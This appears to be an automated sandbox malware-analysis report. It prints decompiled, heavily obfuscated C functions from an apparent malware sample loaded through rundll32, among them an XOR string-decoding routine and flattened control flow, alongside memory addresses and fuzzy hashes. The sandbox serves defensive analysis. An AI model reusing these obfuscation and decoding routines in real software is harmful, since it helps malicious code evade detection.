                                                                                                                      0x00350d84
                                                                                                                      0x00350d8c
                                                                                                                      0x00350d94
                                                                                                                      0x00350d9c
                                                                                                                      0x00350da1
                                                                                                                      0x00350da9
                                                                                                                      0x00350db1
                                                                                                                      0x00350db9
                                                                                                                      0x00350dc1
                                                                                                                      0x00350dc9
                                                                                                                      0x00350dd1
                                                                                                                      0x00350dd9
                                                                                                                      0x00350dde
                                                                                                                      0x00350de6
                                                                                                                      0x00350df2
                                                                                                                      0x00350dfa
                                                                                                                      0x00350dfe
                                                                                                                      0x00350e06
                                                                                                                      0x00350e0e
                                                                                                                      0x00350e16
                                                                                                                      0x00350e1e
                                                                                                                      0x00350e26
                                                                                                                      0x00350e2e
                                                                                                                      0x00350e36
                                                                                                                      0x00350e36
                                                                                                                      0x00350e40
                                                                                                                      0x00350e87
                                                                                                                      0x00350e8c
                                                                                                                      0x00000000
                                                                                                                      0x00350e42
                                                                                                                      0x00350e44
                                                                                                                      0x00350e81
                                                                                                                      0x00350ecf
                                                                                                                      0x00350e83
                                                                                                                      0x00350e83
                                                                                                                      0x00000000
                                                                                                                      0x00350e83
                                                                                                                      0x00350e46
                                                                                                                      0x00350e48
                                                                                                                      0x00350ec3
                                                                                                                      0x00350e4a
                                                                                                                      0x00350e50
                                                                                                                      0x00000000
                                                                                                                      0x00350e52
                                                                                                                      0x00350e5e
                                                                                                                      0x00350e5f
                                                                                                                      0x00350e62
                                                                                                                      0x00350e6a
                                                                                                                      0x00350e6f
                                                                                                                      0x00000000
                                                                                                                      0x00350e6f
                                                                                                                      0x00350e50
                                                                                                                      0x00350e48
                                                                                                                      0x00350e44
                                                                                                                      0x00350ed1
                                                                                                                      0x00350ed9
                                                                                                                      0x00350ed9
                                                                                                                      0x00350e9b
                                                                                                                      0x00350ea1
                                                                                                                      0x00000000
                                                                                                                      0x00350e9d
                                                                                                                      0x00350e9d
                                                                                                                      0x00000000
                                                                                                                      0x00350e9d
                                                                                                                      0x00000000
                                                                                                                      0x00350ea3
                                                                                                                      0x00350ea3
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: +K
                                                                                                                      • API String ID: 0-3601299342
                                                                                                                      • Opcode ID: 3f35a3fb25c55c75c9da133932055431c71371d10b7b97cadb19e54cb265a978
                                                                                                                      • Instruction ID: 38cc0d8babed43d427723e2270f9f68f687f7e020f543a68e9ac46f4e2a15817
                                                                                                                      • Opcode Fuzzy Hash: 3f35a3fb25c55c75c9da133932055431c71371d10b7b97cadb19e54cb265a978
                                                                                                                      • Instruction Fuzzy Hash: 7741E072608701DBC759CF20C84692FBBE1EBD8318F608E1DF9925A270D772D909CB46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0034AB66 Relevance: 1.3, Strings: 1, Instructions: 93COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E0034AB66(void* __ecx, void* __edx, void* __eflags) {
				void* _t42;
				signed int _t46;
				short* _t63;
				signed int _t64;
				signed int _t66;
				signed int _t74;
				unsigned int _t75;
				unsigned int _t76;
				short* _t79;
				signed int* _t80;
				signed int* _t81;
				signed int* _t82;
				unsigned int _t84;
				void* _t90;
				short _t92;
				void* _t94;
				void* _t95;

				_t82 =  *(_t94 + 0x1c);
				_push( *(_t94 + 0x28));
				_push( *(_t94 + 0x28));
				_push(_t82);
				_push(__ecx);
				E0034CF25(_t42);
				 *(_t94 + 0x24) = 0xc8fa9a;
				_t80 =  &(_t82[1]);
				 *(_t94 + 0x24) =  *(_t94 + 0x24) + 0x149f;
				 *(_t94 + 0x24) =  *(_t94 + 0x24) ^ 0x00c381cf;
				 *(_t94 + 0x34) = 0x8cac1;
				 *(_t94 + 0x34) =  *(_t94 + 0x34) | 0xffff7fdf;
				 *(_t94 + 0x34) =  *(_t94 + 0x34) ^ 0xfffda11e;
				 *(_t94 + 0x20) = 0x3c356c;
				 *(_t94 + 0x20) =  *(_t94 + 0x20) * 0x2a;
				 *(_t94 + 0x20) =  *(_t94 + 0x20) + 0x83f9;
				 *(_t94 + 0x20) =  *(_t94 + 0x20) ^ 0x09ee4754;
				_t66 =  *_t82;
				_t81 =  &(_t80[1]);
				_t46 =  *_t80 ^ _t66;
				 *(_t94 + 0x28) = _t66;
				 *(_t94 + 0x2c) = _t46;
				_t24 = _t46 + 1; // 0x3c356d
				_t84 =  !=  ? (_t24 & 0xfffffffc) + 4 : _t24;
				_t95 = _t94 + 0xc;
				_t63 = E00353512(_t84 + _t84);
				 *((intOrPtr*)(_t95 + 0x28)) = _t63;
				if(_t63 != 0) {
					_t92 = 0;
					_t79 = _t63;
					_t90 =  >  ? 0 :  &(_t81[_t84 >> 2]) - _t81 + 3 >> 2;
					if(_t90 != 0) {
						_t64 =  *(_t95 + 0x18);
						do {
							_t74 =  *_t81;
							_t81 =  &(_t81[1]);
							_t75 = _t74 ^ _t64;
							 *_t79 = _t75 & 0x000000ff;
							_t79 = _t79 + 8;
							 *((short*)(_t79 - 6)) = _t75 >> 0x00000008 & 0x000000ff;
							_t76 = _t75 >> 0x10;
							_t92 = _t92 + 1;
							 *((short*)(_t79 - 4)) = _t76 & 0x000000ff;
							 *((short*)(_t79 - 2)) = _t76 >> 0x00000008 & 0x000000ff;
						} while (_t92 < _t90);
						_t63 =  *((intOrPtr*)(_t95 + 0x24));
					}
					 *((short*)(_t63 +  *(_t95 + 0x1c) * 2)) = 0;
				}
				return _t63;
			}




















                                                                                                                      0x0034ab6b
                                                                                                                      0x0034ab70
                                                                                                                      0x0034ab74
                                                                                                                      0x0034ab78
                                                                                                                      0x0034ab7a
                                                                                                                      0x0034ab7b
                                                                                                                      0x0034ab80
                                                                                                                      0x0034ab88
                                                                                                                      0x0034ab8b
                                                                                                                      0x0034ab93
                                                                                                                      0x0034ab9b
                                                                                                                      0x0034aba3
                                                                                                                      0x0034abab
                                                                                                                      0x0034abb3
                                                                                                                      0x0034abc0
                                                                                                                      0x0034abc4
                                                                                                                      0x0034abcc
                                                                                                                      0x0034abd4
                                                                                                                      0x0034abd8
                                                                                                                      0x0034abdb
                                                                                                                      0x0034abdd
                                                                                                                      0x0034abe1
                                                                                                                      0x0034abe5
                                                                                                                      0x0034abf5
                                                                                                                      0x0034ac00
                                                                                                                      0x0034ac0f
                                                                                                                      0x0034ac11
                                                                                                                      0x0034ac19
                                                                                                                      0x0034ac21
                                                                                                                      0x0034ac23
                                                                                                                      0x0034ac34
                                                                                                                      0x0034ac39
                                                                                                                      0x0034ac3b
                                                                                                                      0x0034ac3f
                                                                                                                      0x0034ac3f
                                                                                                                      0x0034ac41
                                                                                                                      0x0034ac44
                                                                                                                      0x0034ac49
                                                                                                                      0x0034ac51
                                                                                                                      0x0034ac57
                                                                                                                      0x0034ac5b
                                                                                                                      0x0034ac64
                                                                                                                      0x0034ac65
                                                                                                                      0x0034ac6c
                                                                                                                      0x0034ac70
                                                                                                                      0x0034ac74
                                                                                                                      0x0034ac74
                                                                                                                      0x0034ac7f
                                                                                                                      0x0034ac7f
                                                                                                                      0x0034ac8b

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: TG
                                                                                                                      • API String ID: 0-2762469129
                                                                                                                      • Opcode ID: de49195854164d4ba6e370293f3bba852aaf4d501735938fb8aa480511fba751
                                                                                                                      • Instruction ID: b43fc238f7b61acfdf5fdfceef64e99dcb981fd7074279af20cb57a0255ccb63
                                                                                                                      • Opcode Fuzzy Hash: de49195854164d4ba6e370293f3bba852aaf4d501735938fb8aa480511fba751
                                                                                                                      • Instruction Fuzzy Hash: B9317C726097118BC714DF28C48546AF7E0FF88728F455B2DF889AB250D774EE09CB9A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0035109E Relevance: 1.3, Strings: 1, Instructions: 87COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0035109E(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t76;
				void* _t82;
				void* _t83;
				signed int _t85;
				signed int _t86;
				signed int _t87;
				void* _t96;
				void* _t97;
				signed int* _t99;

				_t99 =  &_v28;
				_v24 = 0xd283c4;
				_v24 = _v24 >> 8;
				_v24 = _v24 << 9;
				_t83 = __ecx;
				_t96 = 0;
				_t85 = 0x2d;
				_v24 = _v24 / _t85;
				_v24 = _v24 ^ 0x0004da81;
				_t97 = 0xc7350e4;
				_v16 = 0x64139d;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 ^ 0x00062b71;
				_v28 = 0xade301;
				_v28 = _v28 ^ 0x8f618bae;
				_v28 = _v28 >> 4;
				_t86 = 0x7e;
				_v28 = _v28 / _t86;
				_v28 = _v28 ^ 0x001433c5;
				_v20 = 0x6fd8b7;
				_v20 = _v20 << 5;
				_t87 = 0x39;
				_v20 = _v20 / _t87;
				_v20 = _v20 ^ 0x003ef69f;
				_v4 = 0x5f989c;
				_v4 = _v4 + 0xda74;
				_v4 = _v4 ^ 0x006bc492;
				_v12 = 0x987d41;
				_v12 = _v12 << 9;
				_v12 = _v12 + 0x3c41;
				_v12 = _v12 ^ 0x30fa219f;
				_v8 = 0x945ab1;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x002dcc5b;
				do {
					while(_t97 != 0xa0feddc) {
						if(_t97 == 0xc7350e4) {
							_t97 = 0xf55d56d;
							continue;
						} else {
							if(_t97 == 0xf55d56d) {
								_t82 = E0035274F();
								_t99 = _t99 - 0xc + 0xc;
								_t97 = 0xa0feddc;
								_t96 = _t96 + _t82;
								continue;
							}
						}
						goto L7;
					}
					_t76 = E0034B782(_t83 + 4, _v4, _v12, _v8);
					_t99 =  &(_t99[2]);
					_t97 = 0x490b4c9;
					_t96 = _t96 + _t76;
					L7:
				} while (_t97 != 0x490b4c9);
				return _t96;
			}



















                                                                                                                      0x0035109e
                                                                                                                      0x003510a1
                                                                                                                      0x003510ab
                                                                                                                      0x003510b0
                                                                                                                      0x003510bf
                                                                                                                      0x003510c1
                                                                                                                      0x003510c3
                                                                                                                      0x003510c8
                                                                                                                      0x003510ce
                                                                                                                      0x003510d6
                                                                                                                      0x003510db
                                                                                                                      0x003510e8
                                                                                                                      0x003510ed
                                                                                                                      0x003510f2
                                                                                                                      0x003510fa
                                                                                                                      0x00351102
                                                                                                                      0x0035110a
                                                                                                                      0x00351113
                                                                                                                      0x00351118
                                                                                                                      0x0035111e
                                                                                                                      0x00351126
                                                                                                                      0x0035112e
                                                                                                                      0x00351137
                                                                                                                      0x0035113a
                                                                                                                      0x0035113e
                                                                                                                      0x00351146
                                                                                                                      0x0035114e
                                                                                                                      0x00351156
                                                                                                                      0x0035115e
                                                                                                                      0x00351166
                                                                                                                      0x0035116b
                                                                                                                      0x00351173
                                                                                                                      0x0035117b
                                                                                                                      0x00351183
                                                                                                                      0x00351188
                                                                                                                      0x00351190
                                                                                                                      0x00351190
                                                                                                                      0x0035119e
                                                                                                                      0x003511c8
                                                                                                                      0x00000000
                                                                                                                      0x003511a0
                                                                                                                      0x003511a2
                                                                                                                      0x003511b7
                                                                                                                      0x003511bc
                                                                                                                      0x003511bf
                                                                                                                      0x003511c4
                                                                                                                      0x00000000
                                                                                                                      0x003511c4
                                                                                                                      0x003511a2
                                                                                                                      0x00000000
                                                                                                                      0x0035119e
                                                                                                                      0x003511db
                                                                                                                      0x003511e0
                                                                                                                      0x003511e3
                                                                                                                      0x003511e8
                                                                                                                      0x003511ea
                                                                                                                      0x003511ea
                                                                                                                      0x003511fb

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: A<
                                                                                                                      • API String ID: 0-2278821948
                                                                                                                      • Opcode ID: 97b66c1337cb10c1d396c65a6684b4c2d0d3bf5368e036497ae656dbc9f15019
                                                                                                                      • Instruction ID: 54c06ed8d41e4641822d31bc4e57446e2d83bc4aeeff6743118a3debfa4ce6c1
                                                                                                                      • Opcode Fuzzy Hash: 97b66c1337cb10c1d396c65a6684b4c2d0d3bf5368e036497ae656dbc9f15019
                                                                                                                      • Instruction Fuzzy Hash: 503189729083018BC305DE25C84941BBBE1FBD4B58F118A6DF989AB260D3B1DE0CCB97
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00348650 Relevance: 1.3, Strings: 1, Instructions: 86COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 86%
                                                                                                                      			E00348650(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				void* _t83;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				signed int _t105;
				void* _t118;
				signed int _t119;

				_push(_a4);
				_t118 = __edx;
				_push(__edx);
				E0034CF25(_t83);
				_v36 = _v36 & 0x00000000;
				_v32 = _v32 & 0x00000000;
				_v40 = 0x27bdd4;
				_v24 = 0x769f2a;
				_v24 = _v24 << 1;
				_v24 = _v24 ^ 0x00e6321c;
				_v8 = 0xfef45c;
				_t102 = 0x31;
				_v8 = _v8 / _t102;
				_v8 = _v8 | 0xf1ae833d;
				_v8 = _v8 ^ 0x9231f40a;
				_v8 = _v8 ^ 0x6392d2fe;
				_v16 = 0x3d43fb;
				_v16 = _v16 >> 4;
				_v16 = _v16 ^ 0x97e6d5b2;
				_v16 = _v16 ^ 0x97eefe03;
				_v12 = 0x33c712;
				_v12 = _v12 >> 7;
				_v12 = _v12 + 0x2d9c;
				_t103 = 0x16;
				_v12 = _v12 / _t103;
				_v12 = _v12 ^ 0x00054cf8;
				_v28 = 0xb0e606;
				_v28 = _v28 | 0xfcdd39f2;
				_v28 = _v28 * 0x19;
				_v28 = _v28 ^ 0xb4c190eb;
				E00345AE2(_t103);
				_v24 = 0x8c0b06;
				_v24 = _v24 + 0x3875;
				_v24 = _v24 ^ 0xc8b8cfa1;
				_v24 = _v24 ^ 0xc8348cde;
				_v20 = 0xa003e6;
				_t104 = 0x69;
				_v20 = _v20 / _t104;
				_t105 = 0x51;
				_v20 = _v20 / _t105;
				_v20 = _v20 ^ 0x000004c1;
				_t119 = E0034EF71(_v24, _v20);
				_push(_t119);
				_push(_v28);
				_push(_t118);
				E00345A07(1, _v12);
				 *((short*)(_t118 + _t119 * 2)) = 0;
				return 0;
			}



















                                                                                                                      0x00348658
                                                                                                                      0x0034865b
                                                                                                                      0x0034865d
                                                                                                                      0x0034865f
                                                                                                                      0x00348664
                                                                                                                      0x0034866a
                                                                                                                      0x0034866e
                                                                                                                      0x00348675
                                                                                                                      0x0034867c
                                                                                                                      0x0034867f
                                                                                                                      0x00348686
                                                                                                                      0x00348692
                                                                                                                      0x00348697
                                                                                                                      0x0034869c
                                                                                                                      0x003486a3
                                                                                                                      0x003486aa
                                                                                                                      0x003486b1
                                                                                                                      0x003486b8
                                                                                                                      0x003486bc
                                                                                                                      0x003486c3
                                                                                                                      0x003486ca
                                                                                                                      0x003486d1
                                                                                                                      0x003486d5
                                                                                                                      0x003486df
                                                                                                                      0x003486e2
                                                                                                                      0x003486e5
                                                                                                                      0x003486ec
                                                                                                                      0x003486f3
                                                                                                                      0x003486fe
                                                                                                                      0x00348701
                                                                                                                      0x0034870b
                                                                                                                      0x00348710
                                                                                                                      0x00348719
                                                                                                                      0x00348720
                                                                                                                      0x00348727
                                                                                                                      0x0034872e
                                                                                                                      0x0034873a
                                                                                                                      0x0034873f
                                                                                                                      0x00348747
                                                                                                                      0x0034874a
                                                                                                                      0x0034874d
                                                                                                                      0x00348765
                                                                                                                      0x00348769
                                                                                                                      0x0034876a
                                                                                                                      0x00348771
                                                                                                                      0x00348772
                                                                                                                      0x0034877c
                                                                                                                      0x00348785

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: u8
                                                                                                                      • API String ID: 0-999499730
                                                                                                                      • Opcode ID: 18f189f9c650fbaeadc2e42c6b49d8db23d579580a1ac72df02d86a7d0229630
                                                                                                                      • Instruction ID: ffa79f16e3a35e7588c03e99e36c4e835da288648aaedd536a88a7d320e7572c
                                                                                                                      • Opcode Fuzzy Hash: 18f189f9c650fbaeadc2e42c6b49d8db23d579580a1ac72df02d86a7d0229630
                                                                                                                      • Instruction Fuzzy Hash: 22313471D00209EBDB09CFA5C98AAEFBBB1FF44314F208059E515BA2A0D7B55B54CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0034EC9B Relevance: 1.3, Strings: 1, Instructions: 84COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E0034EC9B(void* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _t99;
				intOrPtr _t104;
				signed int _t114;
				signed int _t115;
				signed int _t116;

				_v52 = _v52 & 0x00000000;
				_v48 = _v48 & 0x00000000;
				_v56 = 0x52d5fa;
				_v32 = 0xd2ae86;
				_v32 = _v32 >> 6;
				_v32 = _v32 ^ 0x0000dff8;
				_v8 = 0x945d31;
				_v8 = _v8 >> 9;
				_v8 = _v8 | 0xfea629bb;
				_t114 = __edx;
				_v8 = _v8 * 0x68;
				_v8 = _v8 ^ 0x739e55b5;
				_v16 = 0xe343a6;
				_v16 = _v16 + 0xffffaeee;
				_v16 = _v16 << 0xd;
				_v16 = _v16 ^ 0x5e55869e;
				_v28 = 0xa35055;
				_v28 = _v28 ^ 0xccdb3a8a;
				_v28 = _v28 ^ 0xcc747f7c;
				_v12 = 0x417a71;
				_t115 = 0xc;
				_v12 = _v12 / _t115;
				_v12 = _v12 + 0xffffd743;
				_v12 = _v12 ^ 0x254bb370;
				_v12 = _v12 ^ 0x25474737;
				_v36 = 0x5ce014;
				_v36 = _v36 << 0xb;
				_v36 = _v36 ^ 0xe70ab788;
				_v20 = 0x24db01;
				_t116 = 0x63;
				_v20 = _v20 * 0x3c;
				_v20 = _v20 + 0xe28f;
				_v20 = _v20 ^ 0x08ab7f21;
				_v44 = 0x4977db;
				_v44 = _v44 * 0x38;
				_v44 = _v44 ^ 0x1015e45e;
				_v24 = 0xa0027c;
				_v24 = _v24 | 0xcfe9110c;
				_v24 = _v24 + 0xffff4bac;
				_v24 = _v24 ^ 0xcfe5f801;
				_v40 = 0x81bf9e;
				_v40 = _v40 / _t116;
				_v40 = _v40 ^ 0x000d137a;
				_push(_v28);
				_push(_v16);
				_push(__ecx);
				_t99 = E003607D7(_v12, _v36, E0034AB66(_v32, _v8, _v40), _v20);
				_t104 =  *0x365c8c; // 0x0
				 *((intOrPtr*)(_t104 + 4 + _t114 * 4)) = _t99;
				return E0034AE03(_v44, _v24, _v40, _t98);
			}





















                                                                                                                      0x0034eca1
                                                                                                                      0x0034eca5
                                                                                                                      0x0034eca9
                                                                                                                      0x0034ecb0
                                                                                                                      0x0034ecb7
                                                                                                                      0x0034ecbb
                                                                                                                      0x0034ecc2
                                                                                                                      0x0034ecc9
                                                                                                                      0x0034eccd
                                                                                                                      0x0034ecdc
                                                                                                                      0x0034ece0
                                                                                                                      0x0034ece3
                                                                                                                      0x0034ecea
                                                                                                                      0x0034ecf1
                                                                                                                      0x0034ecf8
                                                                                                                      0x0034ecfc
                                                                                                                      0x0034ed03
                                                                                                                      0x0034ed0a
                                                                                                                      0x0034ed11
                                                                                                                      0x0034ed18
                                                                                                                      0x0034ed22
                                                                                                                      0x0034ed27
                                                                                                                      0x0034ed2c
                                                                                                                      0x0034ed33
                                                                                                                      0x0034ed3a
                                                                                                                      0x0034ed41
                                                                                                                      0x0034ed48
                                                                                                                      0x0034ed4c
                                                                                                                      0x0034ed53
                                                                                                                      0x0034ed5e
                                                                                                                      0x0034ed5f
                                                                                                                      0x0034ed62
                                                                                                                      0x0034ed69
                                                                                                                      0x0034ed70
                                                                                                                      0x0034ed7b
                                                                                                                      0x0034ed7e
                                                                                                                      0x0034ed85
                                                                                                                      0x0034ed8c
                                                                                                                      0x0034ed93
                                                                                                                      0x0034ed9a
                                                                                                                      0x0034eda1
                                                                                                                      0x0034edad
                                                                                                                      0x0034edb0
                                                                                                                      0x0034edb7
                                                                                                                      0x0034edba
                                                                                                                      0x0034edc0
                                                                                                                      0x0034edd5
                                                                                                                      0x0034edda
                                                                                                                      0x0034ede7
                                                                                                                      0x0034edfb

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 7GG%
                                                                                                                      • API String ID: 0-3444672964
                                                                                                                      • Opcode ID: fa2c9db9d154bac8161efa8499b148b1940ea687dd285436322002f3e94f6c08
                                                                                                                      • Instruction ID: 90942ff827433b84a14db84b984c4ef41e87af270e8fbb2cb91ae95bd36959f3
                                                                                                                      • Opcode Fuzzy Hash: fa2c9db9d154bac8161efa8499b148b1940ea687dd285436322002f3e94f6c08
                                                                                                                      • Instruction Fuzzy Hash: 6241EFB1C01219AFCB08CFE5C98A9DEBFB1FB48314F208199D511BA260C7B51A46CFA5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00353512 Relevance: 1.3, Strings: 1, Instructions: 64COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00353512(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _t83;
				void* _t88;

				_v36 = _v36 & 0x00000000;
				_v48 = 0xd3138f;
				_v44 = 0xbafb06;
				_v40 = 0xb4c902;
				_v28 = 0x9a00a8;
				_v28 = _v28 + 0xffff4980;
				_v28 = _v28 + 0xffff4b07;
				_v28 = _v28 ^ 0x00989527;
				_v12 = 0x37fcba;
				_v12 = _v12 + 0xffff1054;
				_v12 = _v12 ^ 0xaae49dfe;
				_v12 = _v12 | 0x5520ddcc;
				_v12 = _v12 ^ 0xfff3c0c4;
				_v8 = 0xafb0cb;
				_t88 = __ecx;
				_t83 = 0x7b;
				_v8 = _v8 / _t83;
				_v8 = _v8 << 0xb;
				_v8 = _v8 + 0xffff2cb4;
				_v8 = _v8 ^ 0x0b6cc095;
				_v24 = 0x7eb81c;
				_v24 = _v24 | 0x606632c5;
				_v24 = _v24 + 0x73a0;
				_v24 = _v24 * 0x3c;
				_v24 = _v24 ^ 0x9dca2ad3;
				_v20 = 0x11602;
				_v20 = _v20 * 0x5d;
				_v20 = _v20 + 0xd70f;
				_v20 = _v20 + 0x91d0;
				_v20 = _v20 ^ 0x006b4c23;
				_v32 = 0x7d7f;
				_v32 = _v32 + 0x7879;
				_v32 = _v32 ^ 0x000fb411;
				_v16 = 0xa8b2e1;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 + 0xffff543c;
				_v16 = _v16 ^ 0xd60d7738;
				_v16 = _v16 ^ 0x29f40b7c;
				return E00347A47(_v28, _v24, _v20, E00355BB3(), _t88, _v32, _v16);
			}
















                                                                                                                      0x00353518
                                                                                                                      0x0035351e
                                                                                                                      0x00353525
                                                                                                                      0x0035352c
                                                                                                                      0x00353533
                                                                                                                      0x0035353a
                                                                                                                      0x00353541
                                                                                                                      0x00353548
                                                                                                                      0x0035354f
                                                                                                                      0x00353556
                                                                                                                      0x0035355d
                                                                                                                      0x00353564
                                                                                                                      0x0035356b
                                                                                                                      0x00353572
                                                                                                                      0x0035357d
                                                                                                                      0x00353581
                                                                                                                      0x00353584
                                                                                                                      0x00353587
                                                                                                                      0x0035358b
                                                                                                                      0x00353592
                                                                                                                      0x00353599
                                                                                                                      0x003535a0
                                                                                                                      0x003535a7
                                                                                                                      0x003535b2
                                                                                                                      0x003535b5
                                                                                                                      0x003535bc
                                                                                                                      0x003535c7
                                                                                                                      0x003535ca
                                                                                                                      0x003535d1
                                                                                                                      0x003535d8
                                                                                                                      0x003535df
                                                                                                                      0x003535e6
                                                                                                                      0x003535ed
                                                                                                                      0x003535f4
                                                                                                                      0x003535fb
                                                                                                                      0x003535ff
                                                                                                                      0x00353606
                                                                                                                      0x0035360d
                                                                                                                      0x0035363c

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #Lk
                                                                                                                      • API String ID: 0-1139186034
                                                                                                                      • Opcode ID: 113ec85c3a59fd735fa232de4a646e64cc00cec35d4fe763381d1135a8ddbe7c
                                                                                                                      • Instruction ID: 501f38ad5b41fc0cae0a19a4f05371eee211d268550ca2d6f7affe94211db16b
                                                                                                                      • Opcode Fuzzy Hash: 113ec85c3a59fd735fa232de4a646e64cc00cec35d4fe763381d1135a8ddbe7c
                                                                                                                      • Instruction Fuzzy Hash: DA31CDB1C0131EABCB58CFA5C94A5EEBBB5BF14318F208188D515BA260D3B91B49CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100323E2 Relevance: .4, Instructions: 384COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
